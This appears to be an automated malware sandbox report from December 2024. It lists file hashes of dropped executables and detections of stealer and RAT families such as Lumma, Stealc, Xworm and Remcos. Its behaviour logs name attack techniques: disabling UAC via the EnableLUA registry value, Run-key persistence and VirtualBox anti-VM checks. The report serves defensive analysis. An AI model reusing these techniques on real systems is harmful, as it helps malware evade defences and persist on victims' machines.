memory/5988-2831-0x00000000002A0000-0x00000000002B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe

MD5 d71d031f039f8fb153488c26fb7d410f
SHA1 5b15fd6f94bdbb35ecd02bf9aa51912d698ebf45
SHA256 36541a0e062085fed175a4a5eae45aa9e3563fff4a816a1bffa1b2c6f8280e5b
SHA512 d97c801c73f14ae20b11529d0b0f58afc3981d92bd00f88dda59881f24d89d3b325a8c61b88adc77753cebb1c320afc64af7522c61c34b2a4916b13bddc278cf

C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe

MD5 530f21922a75517fd8a9f943e6c90751
SHA1 a1e2f0196821cb9f7097ba2a93e4bb0cf3336751
SHA256 4775ea475df3798d292243807fe77d734d95bf82d42bcd4a9a66fef1385a6b41
SHA512 27f8e01d7fa946750f001d8b4b3253f95eff9ed4850c12e652d59f79c502051bc651037679050b8e86fb8a24f9ecb607e533d60ee68dfe060f733c130fa071cd

C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe

MD5 f5b93d3369d1ae23d6e150e75d2b6a80
SHA1 6f6914770748ad148154e1576d9c6fe6887f2290
SHA256 343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81
SHA512 dcedaed2df62386b980cc1957f224fc48224aeb0f5bf8d0241acc7a0a552b0ae90697ed333189963540f8391cbecfa0977a8685723c5025c9a4f95918032cf1e

memory/4996-2901-0x00000000004F0000-0x00000000005E2000-memory.dmp

memory/4996-2902-0x0000000005090000-0x00000000050D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe

MD5 fb3217dd8cddb17b78a30cf4d09681fc
SHA1 e4c4f4c1812927b176b58660d2edba75d103a76a
SHA256 12938790f91b2612b7c6a1fd4aa16219a7d2469731e27d4bbd409ad438e64669
SHA512 4e37b8c6638c8c203fc2163be6014827a8c690506f50a8ec87022f7f5a74645f2c5bbcdfd7e0e75ec67775bc81887d6b094f08778c1f90c3909d46c8432344f4

memory/3152-2913-0x0000000000400000-0x000000000082B000-memory.dmp

memory/4996-2940-0x00000000067F0000-0x000000000680A000-memory.dmp

memory/4996-2941-0x0000000007140000-0x0000000007146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe

MD5 8560f9c870d3d0e59d1263fb154fbe6c
SHA1 4749a3b48eb0acddea8e3350c1e41b02f92c38dd
SHA256 99d846627f494e80a686d75c497db1ac1aadf4437e2d7cc7ace2785ffa5fa5e0
SHA512 82b771b2b725c04c41b6d97288cdf49b0c1d522f8094f16f6066f4cd884f8a419325b20aaca17e01ddbffb8ca36a0d29d283e7f08e34af7b8e29474892432824

memory/3968-2975-0x0000000000420000-0x0000000000476000-memory.dmp

memory/3428-2987-0x00000000004F0000-0x0000000000502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe

MD5 a23837debdc8f0e9fce308bff036f18f
SHA1 cf4df97e65bc8a17eefca9d384f55f19fb50602f
SHA256 848260ba966228c4db251cfbcc0e02d6ca70523a86b56e5c21f55098cec92479
SHA512 986e7354d758523ae4f4c2f38e4b8f629dbeeaba4b60bfd919d85139e8d8c29c0489989deab6e33022d6a744bdd93ce7c8e687036c5c4af63cce6e6f6e8bd0ad

C:\Users\Admin\AppData\Local\Temp\Files\f86nrrc6.exe

MD5 405189dd2992fa14910457e2870ce73e
SHA1 907512e238b326c32545a36da3061f5c07a9ac9d
SHA256 879eb020a578c492edcec1ed4b6675468779f9d0987f0008b7102df9d178cdfe
SHA512 a509a134ff8b051e63a83ca8e3f7a890f203b1432235cc2a3320ee643a7983eaa447379a9672fba32bcf095fd429cfa46d405d8219e8de4d7c6bb3358cb3b584

C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe

MD5 703bea610f53655fa0014b93f0fa4b7e
SHA1 a3caccfaeffc6c6c39644404ad93455d37f0cdab
SHA256 1dac4bd2e15c7e98e3e8c657e9f6463f6d4f7d6a1256a3270649bfa5154c9e73
SHA512 9d083a762a23c05e9a084a6424a0852725ed4fb010b074416228034c4bbbbfce2bcfc9cf3e9f24f719d768cf8204eade9d3dcaf4a414c79fcb4b4f5af4986aeb

C:\Users\Admin\AppData\Local\Temp\Files\build11.exe

MD5 2cb47309bb7dde63256835d5c872b2f9
SHA1 8baa9effc09cf80b4a1bac1aa2aa92b38c812f1d
SHA256 18687a2ceebf3eda4a11a2ef0b1d85360d8837ad05c1b57f9f749ea06578848e
SHA512 3db4a42cbf6bc26d77320bf747e7244e54320b5e6ebf6a65bfd731beb7e99958bc5b7e9fe3ab1579becd42c588789c2185be74f143d120041b0331b316017104

C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe

MD5 0f02da56dab4bc19fca05d6d93e74dcf
SHA1 a809c7e9c3136b8030727f128004aa2c31edc7a9
SHA256 e1d0fe3bada7fdec17d7279e6294731e2684399905f05e5a3449ba14542b1379
SHA512 522ec9042680a94a73cefa56e7902bacb166e23484f041c9e06dce033d3d16d13f7508f4d1e160c81198f61aa8c9a5aecfa62068150705ecf4803733f7e01ded

C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe

MD5 68a99cf42959dc6406af26e91d39f523
SHA1 f11db933a83400136dc992820f485e0b73f1b933
SHA256 c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3
SHA512 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe

MD5 d165b333fe9244a43967bc69c0b686cc
SHA1 58fbba484bdeeb020cc69a78218c897d28f7e2f2
SHA256 01a2bb9f7591986b6eb3388699e7ce4a52b2686295b48dae0ec001639ba9f9b4
SHA512 616556797aaad5deb2d5e8e8a70427d4e0b9ca4f64dd5976cdeaa3c6d8a37a612011e89b120a6ef2e1ef8a50d70483a71d8289a09952f612a9023d5f2922b580

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

MD5 13095aaded59fb08db07ecf6bc2387ef
SHA1 13466ec6545a05da5d8ea49a8ec6c56c4f9aa648
SHA256 02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671
SHA512 fe10e40072e12c68edd3c3fcb9583253a4ee9fd7ec42f2a423829202abedf443c654968acb44919ad8ba3ecafa77c95b7fd2b8b641dd83779960363c0bb11bf0

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

MD5 9b3fafa68ef718b5b7bf3f1f46c698df
SHA1 cd2de4a0a94d42c278bab73d29d716369ec644f4
SHA256 2443d1fe25f8afbd5b9cd95fdb45e7c6c5b688e815f44f93158e534308d9f9fb
SHA512 a8f180bdf01a59a36e69708420774c2a8607869f8c34ae1e0d40b8298db3b9d88efd0251aa3444b9cdbadad1bf6d8b9d61fb270a41be18f81b10a0505b1b1f28

C:\Users\Admin\AppData\Local\Temp\_MEI57282\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe

MD5 2ca4bd5f5fece4e6def53720f2a7a9bb
SHA1 04b49bb6f0b9600782d091eaa5d54963ff6d7e10
SHA256 ab55d9b53f755a232a7968d7b5fcb6ca56fc0f59e72b1e60ab8624a0ee6be8c1
SHA512 3e9e5c9793b4880990fbc8ab38f8a28b38a7493adb3ee1727e5ce0f8377348142705533f672356152a895694800c82517c71f2070c0dff08b73555214a165481

C:\Users\Admin\AppData\Local\Temp\login_db

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe

MD5 aad42bb76a48e18ab273efef7548363d
SHA1 0b09fabe2a854ded0c5b9050341eb17ced9f4c09
SHA256 f75fbc05bbf3a9d9f9e2b67108f4d54eaf7582d10799385a5656b48ac10e86c6
SHA512 5e58548ad6ff2a0237eea4d8a82695eab5031dca24a25c714f614b9e8fac0e90528cda0d80054f447288fcd9166e72729df32956784159b17ec378ae4278f216

C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe

MD5 72a6fe522fd7466bf2e2ac9daf40a806
SHA1 b0164b9dfee039798191de85a96db7ac54538d02
SHA256 771d0ba5b4f3b2d1c6d7a5ebe9b395e70e3d125540c28f1a0c1f80098c6775ce
SHA512 b938a438e14458120316581cb1883579a2ce7f835b52f4ab1cde33aa85febcad11f8a8b0a23fb9a8acafa774fe9cbd1c804a02fd8e6f5d8df60924c351f0126e

C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe

MD5 6d36580feee622f41b2ab6bfe79a8f5e
SHA1 93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
SHA256 3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
SHA512 9c140cb14fd933f8f9d84d2331b6efbf99c1550a624e7cb26ab85b678d0f8b320fbad8a64e35a40111e10fa30c26f52439c06db59337b19a4df18f368d38117f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe

MD5 cee58644e824d57927fe73be837b1418
SHA1 698d1a11ab58852be004fd4668a6f25371621976
SHA256 4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e
SHA512 ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5

C:\Users\Admin\AppData\Local\Temp\login_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe

MD5 58e8b2eb19704c5a59350d4ff92e5ab6
SHA1 171fc96dda05e7d275ec42840746258217d9caf0
SHA256 07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834
SHA512 e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f

C:\Users\Admin\AppData\Local\Temp\cards_db

MD5 a1eeb9d95adbb08fa316226b55e4f278
SHA1 b36e8529ac3f2907750b4fea7037b147fe1061a6
SHA256 2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7
SHA512 f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8

C:\Users\Admin\AppData\Local\Temp\TmpBC74.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe

MD5 fd636191c054ea1e9f60d45bb50eaafc
SHA1 351cda4cd5f58d474126f5a60f92d4296f28121e
SHA256 d8efa36e63e09c7999fa217695f94d05e6ba642588f5a9c8f5807c8c816b93c1
SHA512 0e4c0f02081bc77115479f136aa2bbd5a8ec6f1d83119b74ceec3a3ee98116c1557623328095a32fd99d380b9f43b519933e307f333f5c6b927774587fb07436

C:\Users\Admin\AppData\Local\Temp\Files\file1.exe

MD5 a107fbd4b2549ebb3babb91cd462cec8
SHA1 e2e9b545884cb1ea0350a2008f61e2e9b7b63939
SHA256 5a9b441d59e7ac7e3bdc74a11ed13150aecbf061b3e6611e2e10d11cd232c5d2
SHA512 05b13ba83b7c0c6a722d4b583a6d9d27e2b3a53002c9c4d6108a712d0d5ccc703580e54841767d0a2d182a3bc60d9c6390065aefd1774316c526f71918f142db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

C:\Users\Admin\Pictures\32y9utl2g50WWog736V9uJlY.exe

MD5 588ec1603a527f59a9ecef1204568bf8
SHA1 5e81d422cda0defb546bbbdaef8751c767df0f29
SHA256 ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16
SHA512 969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9d79e4564e5bb06ac84f1d9d2fddd503
SHA1 504349eb2f737df70a234a822bba8d543c1a9d56
SHA256 706edcd2b8a821b164e3e806c7eb0e84aeaf3646b466226f2ce4ca96552a89a6
SHA512 cb042d40069968a16097536ce2fa17da03dfd6c08c48b12bfe32d36927925f7a942b337712e4a626d07b6ddf90e0cf305feca8e3739a61146395d58961375ab9

C:\Users\Admin\AppData\Local\Temp\cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\tbtnds.dat

MD5 b6989c4a10f84f7862eda017f25c9b98
SHA1 bdc11d738c312beadd9ff0619efccc1cea215fe4
SHA256 a16929fd709ec3ecfefdee4bb1e9eb17bc335aa2f6a9c133e1926e50fe81d553
SHA512 dc0c0d5ad77897bedf9c874c302e79ea5696b7f810b663e8a81f0065925ae47b69fab5e3b7fe585eb427e25bb336bae2f1d03c21b96c89217d25190d4003bf23

C:\Users\Admin\AppData\Local\Temp\1599224382.exe

MD5 cb8420e681f68db1bad5ed24e7b22114
SHA1 416fc65d538d3622f5ca71c667a11df88a927c31
SHA256 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512 baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

C:\Users\Admin\AppData\Local\Temp\1549524169.exe

MD5 96509ab828867d81c1693b614b22f41d
SHA1 c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256 a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512 ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

C:\Users\Admin\AppData\Local\Temp\1094014616.exe

MD5 84897ca8c1aa06b33248956ac25ec20a
SHA1 544d5d5652069b3c5e7e29a1ca3eea46b227bbfe
SHA256 023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1
SHA512 c17d0e364cf29055dece3e10896f0bbd0ebdb8d2b1c15fe68ddcd9951dd2d1545362f45ad21f26302f3da2eb2ec81340a027cbd4c75cc28491151ecabae65e95

C:\Users\Admin\AppData\Local\Temp\32903688.exe

MD5 77c5eb90118287f666886fc34210c176
SHA1 d7a59bf4f014304e29df1868ef82fe782432120a
SHA256 59a96d66d97e202829ea79a5e0bbf71981c05a13ab700b0120f7d99d33515080
SHA512 5577d167ad4748ad7917ff3f792a0caa01ba40638bdf7143c1403d2efcad4019f8da49719ae0ad88febdc1ef64207fba7ca5bb96dc12c334571d30e2e8f22cf9

C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe

MD5 1248d4a486d79f6828c60b8385a1c2c6
SHA1 62c5e5305a75c60c8295aed427d5cc284ee97f1b
SHA256 addaf820ebd6d96728a5fb379579ee1536fb0993f6041d9ceef6e9e439c612a4
SHA512 16bd84d597f601d6ab81204e8431a270dac9ed6331d95dc1944ba0a814b139d68431dabb3249d5e789218bce3c8a3379855f1a142686de109d23bcbb64e6adb5

C:\Users\Admin\AppData\Local\Temp\Files\server.exe

MD5 bf9acb6e48b25a64d9061b86260ca0b6
SHA1 933ee238ef2b9cd33fab812964b63da02283ae40
SHA256 02a8c111fd1bb77b7483dc58225b2a2836b58cdaf9fc903f2f2c88a57066cbc0
SHA512 ac17e6d73922121c1f7c037d1fc30e1367072fdf7d95af344e713274825a03fc90107e024e06fccda21675ee82a2bccad0ae117e55e2b9294d1a0c5056a2031d

C:\Users\Admin\AppData\Local\Temp\Files\injector.exe

MD5 f6aaabbe869f9896e9f42188eeff7bd0
SHA1 1efcc84697399da14b1860e196d7effc09616f45
SHA256 0a0051921bf902df467a3faf3eb43cee8e9b26fbc3582861b2498ec2728bb641
SHA512 7e95891540121e2c15b7f2ce51155fc3a6feefb9b493e2aa550a94b6a00f25ac47a946beb5096bdd6ebc2ac8eeac606f8e372f07d56bba3d697552b2f330aa10

C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe

MD5 28236bd9a2fc826c072bef5a59fc5a9b
SHA1 72d7d9854d05e309e05b218a4af250143a474489
SHA256 ce5b382a28974c9d244d9fa72356d1e0508f75be24e7cd4045b40db5431bee54
SHA512 7e56738851c3552650f2c81b7ff7a30c0135c7b9074a77260e3835ff4572ac2af2a5a3cbd01c7d1d97aeafd9dae91b3e2821ef459550d33c5c4ea5d7a1742c74

C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe

MD5 e021ad0649b6e06642965239a0f1dffb
SHA1 94da03a329d00a4efebff2cfb18471076326b207
SHA256 a872ab63fd3e70627d7bf28a74045a5fca407d79a950ac1fdbcecd6b7672469f
SHA512 e549f1371f5755b684a4a5369492400f61920edfd4b9e0187784b4533219ae77fa48248ad90c54b2f1d63da80821ad620455ed7fa7ac7f2850d5b574d8a5aa43

C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe

MD5 011f3bebde38bdac8ceaebfbff201f4a
SHA1 bb5769d029c5f202e823e038aab2aae454cf0299
SHA256 b6ad170d197d557e308b9356d0f87653eb463cf74a48cbb50ce74c7260c315c2
SHA512 161838d1df3f6b7d7c2d61f98fc5fc55a30281e24433a5fc49a52aad0182bd5c5d581ba294c2a96878d93dc8536499d79a08f8aac879dc0eb5bee7f46b429cdf

C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe

MD5 23c8cb1226c61a164d7518218c837b81
SHA1 45ea74832e487bacb788189c04661b29a71e86b5
SHA256 21aaa5319a6729df0581203a0782ead837b848387e44cd1844ca8e19882a50af
SHA512 8e219108c05966ec8ee6bc2ce2fb40c4aedce6614e65970c356e4f840e88720188c762aaa4451c2f5f1fa1bbc14136ecbcd1f4c9f3b1a5fccc0ab053a37bcc21

C:\Users\Admin\AppData\Local\Temp\Files\shell.exe

MD5 156b3dd7b265fdbeb2ade043097d069b
SHA1 58d37918893d2109804c79f93316570a74aa2855
SHA256 da47b99da4257ab831799c5d2fb02086c093511988fb4239aab3a57dab00c049
SHA512 43d28d9f5b32e8acea884380ef733eaf51b9110c6fe334ab2d9551319c3f4b7e235f08b1f3f26fb5914b6973586e6089f14f7aceebcf110ca40f492f963fdea5

C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe

MD5 b3de5ec01cfa2163f0f62efb3bf41171
SHA1 163f6648d92e9a7e11667d5b20afc05ddb2cda89
SHA256 d55d43e8ddbba6faacaef5a6884a776162d8350212d44f02fbc8b853d8275984
SHA512 d03607bd69942cd775f8c526fbd986bcb04eb06d4b03c83781193eb08cd2bccd4977acfe967fde6b622c1306bac514501f900207f3ce8702c69565e31b7246b8

C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe

MD5 dc860de2a24ea3e15c496582af59b9cb
SHA1 10b23badfb0b31fdeabd8df757a905e394201ec3
SHA256 9211154f8bd85ce85c52cfe91538e6ba2a25704b6efb84c64460ba4da20fa1a9
SHA512 132dad93963cd019fa8fc012f4c780d2ab557e9053afe3f7d4334e247deb77c07bb01c8c5f9c05e9c721d3fe8e6ec29af83b7bb7bf1ad925fae7695ed5cfc3db

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-12 18:19

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

300s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

RMS

trojan rat rms

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5492 created 1652 N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
PID 6584 created 5340 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2120 created 3432 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Windows\Explorer.EXE
PID 5280 created 3432 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 5156 created 608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 2556 created 3432 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 5412 created 5732 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
PID 5412 created 1652 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
PID 5412 created 5744 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
PID 5412 created 5608 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
PID 5412 created 1652 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
PID 5412 created 4532 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\888.exe
PID 5820 created 6052 N/A C:\Windows\system32\svchost.exe C:\Windows\SysWOW64\ruts\rutserv.exe
PID 5412 created 6548 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5412 created 5340 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
PID 3788 created 3432 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 5412 created 5292 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
PID 5412 created 6212 N/A C:\Windows\System32\svchost.exe C:\Windows\SysWOW64\WerFault.exe
PID 5412 created 7936 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 756 created 3432 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
